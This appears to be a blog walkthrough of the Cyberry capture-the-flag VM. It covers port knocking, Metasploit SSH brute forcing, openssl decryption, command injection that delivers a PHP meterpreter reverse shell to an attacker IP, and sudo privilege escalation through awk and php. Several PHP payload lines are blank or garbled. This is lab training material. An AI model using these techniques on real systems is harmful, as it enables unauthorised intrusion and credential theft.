Hello friends!
Today we are going to take another CTF challenge known as Cyberry: 1. the
credit for making this vm machine goes to “Cyberry”
and it is another boot2root challenge where we have to root the server to
complete the challenge. You can download this VM here.
Let’s Breach!!!
Let us start form getting to know the IP of
VM (Here, I have it at 192.168.0.18 but
you will have to find your own)
netdiscover
Use nmap for port enumeration
nmap -sT 192.168.0.18
Nmap scan shows us port 80 is open, so we
open ip address in our browser.
We don’t find anything on the webpage we
use nikto to find more information.
nikto -h http://192.168.0.18
Nikto scan shows us the login page. We open http://192.168.0.18/login.php on the browser.
We don’t find anything on the login page but
a link to the main site http://192.168.0.18/berrypedia.html.
While going through the links on the page.
I found an image called placeho1der.jpg
On further research I found that they all sang the same song “I hear
you knocking”. From the name of the song and the port image, I concluded it had
something to do with port knocking. So I used the release date of the song as
the port.
knock 192.168.0.18 1970
1955 1955 1961
After port knocking we did a nmap scan to
check if any port is open and we find that port 61955 opened after port
knocking
nmap -p- 192.168.0.18
We try netcat but are showed nothing so we
open it in our browser; we find that it is running the same website on a
different port.
We use dirb to check if there are any
different directories on this port.
We find a new directory http://192.168.0.18:61955/H, we open it
and find brain-fuck encoded strings.
We use an online tool to decode the string
1 by 1 and we found a list of username and password. We save the username in
one text file and the password in another.
Now we try to brute force ssh using these
credentials. We use metasploit to brute force ssh.
msf > use
auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set
rhosts 192.168.0.18
msf auxiliary(ssh_login) > set
user_file /root/user.txt
msf auxiliary(ssh_login) > set
pass_file /root/pass.txt
msf auxiliary(ssh_login) > run
We find that the username is mary and
password is bakeoff, but we cannot connect through ssh using these credentials.
So we use these to login through ftp.
ftp 192.168.0.18
After
login through ftp we go inside .bash_history directory there we find 2 files.
We download it into our system and rename
them.
get .reminder.enc /root/reminder
get .trash /root/trash
We check the file type and find that reminder
is encrypted and trash contains password to decrypt it.
file reminder
file trash
cat trash
Now we use openssl to decrypt it. We create
shell code to decrypt it as there are multiple passwords to be used and
multiple types of encryption. We save it in files with name decrypted{encryption}{password}.
for i in ‘openssl enc -ciphers | tail -n
+2’ ; do for j in ‘cat trash’; do openssl ${i:1} -d -salt -md md5 -in reminder
-out “decrypted$i$j” -k $j; done;done 2>/dev/null
Now we check the decrypted files which
contain ascii text.
file * | grep ASCII
We open the file that contains ASCII text
and find it contains a password.
We use this password to login at http://192.168.0.18:61955/login.php.
We use the username we used earlier to brute force ssh and find the username to
be mary.
Now once we login we find a link to page.
When we open the link we find a page that
does DNS lookup, it looks like it may be vulnerable to command injection.
msf > use
exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery)
> set payload php/meterpreter/reverse_tcp
msf
exploit(multi/script/web_delivery) > set lhost 192.168.0.12
msf
exploit(multi/script/web_delivery) > set lport 4444
msf exploit(multi/script/web_delivery) > run
We use burpsuite to capture the request and
execute the command given by metasploit to execute our shell.
As soon as we execute the command we get
our reverse shell.
Now we use generate a python tty shell.
python -c “import pty;
pty.spawn(‘/bin/bash’)”
we find a few files when we open nb-latin
we find it contains a few password.
We download the ‘nb-latin’ file to use it
to bruteforce ssh using the username we found earlier.
We use metasploit to bruteforce ssh using
the new password file we found.
msf > use
auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login)
> set rhosts 192.168.0.18
msf auxiliary(scanner/ssh/ssh_login)
> set user_file user.txt
msf auxiliary(scanner/ssh/ssh_login)
> set pass_file nb-latin
msf auxiliary(scanner/ssh/ssh_login)
> run
We find the password to be custodio for
nick. Now once we login through ssh we check the sudoers list and there are 2
files we can a user terry.
sudo
-u terry /home/nick/invoke.sh /bin/bash
Now we are login as terry, we again check
the sudoers list. We find that we can run awk as user halle. So we spawn a
shell using awk as user halle.
sudo -u halle awk ‘BEGIN
{system(“/bin/bash -I”)}’
As soon as we spawn a shell we login as
halle. We again check sudoers list and find we can run php as user chuck. When
we spawn a tty shell using chuck it crashes. So we create a php file to
enumerate directories. We find a directory called .deleted/
echo ”
> /tmp/shell.php
sudo -u chuck php /tmp/shell.php
When we go inside .deleted folder we find a
file deleted.
echo ”
> /tmp/shell.php
sudo -u chuck php /tmp/shell.php
Now we create a php file to open the file
called deleted.
echo ” > /tmp/shell.php
sudo -u chuck php /tmp/shell.php
Once we open the file we get a hint to
create a password in which ‘e’ is used thrice, [c,r,b,a] are used twice and
[h,w,m,y] are used once that makes the password 15 characters long. Also the
password starts with che and ends with rry and contains baca in between.
We use crunch to create dictionaries with
che at start and rry at end with baca at different positions.
We then merge the all dictionaries into one
using dymerge.
We add root to the dictionary we used first
to brute-force ssh.
Now we use metasploit to bruteforce ssh
using the the new dictionaries.
msf > use
auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login)
> set rhosts 192.168.0.18
msf auxiliary(scanner/ssh/ssh_login)
> set user_file user.txt
msf auxiliary(scanner/ssh/ssh_login)
> set pass_file password.txt
msf auxiliary(scanner/ssh/ssh_login)
> run
Now we find the username as ‘root’ and
password to be ‘chewbacabemerry’. Now we take the session and we are login as
root.
0 comments:
Post a Comment